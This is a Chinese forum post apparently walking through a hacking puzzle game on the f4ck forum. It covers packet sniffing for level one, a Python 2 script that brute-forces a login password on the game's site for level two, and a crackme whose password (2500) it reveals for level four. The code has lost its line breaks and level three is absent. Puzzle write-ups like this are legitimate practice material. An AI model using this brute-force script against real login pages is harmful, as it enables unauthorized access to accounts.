f4ck论坛的小游戏(灌水贴)
第一关，简单抓包

关于抓包python也有现成的库实现也比较简单，这里就不贴代码了

得到了第二关的地址
http://game.f4ck.net/jfasdsdlml.html




第二关，穷举密码，

用python写的时候，发现他有三个库 urllib urllib2 httplib

urllib与urllib2的区别

# -*- coding: cp936 -*-import urllibimport httplibimport urlparseurl = 'game.f4ck.net'path = '/login.php'password = 'f4ck'headers = {'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',           'Accept-Encoding':'gzip, deflate',           'Accept-Language':'zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3',            'Cache-Control':'max-age=0',            'Connection':'keep-alive',            'Host':'game.f4ck.net',            'Referer':'http://game.f4ck.net/jfasdsdlml.html',            'User-Agent':'Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0',            'Content-Type': 'application/x-www-form-urlencoded'           }for i in range(0,5):    for j in range(0,10):        passwordX = password[:i]+str(j)+password[i:]        params = urllib.urlencode({'log':'登录','password':passwordX})            try:            connection = httplib.HTTPConnection(url)            connection.request('POST',path,params,headers)            response = connection.getresponse()            print response.status, response.length, params        except Exception , e:            print e

第四关：
一个crackme

这里用了一个多判断的if ，用od分析起来比较麻烦，用IDA比较简单
密码是2500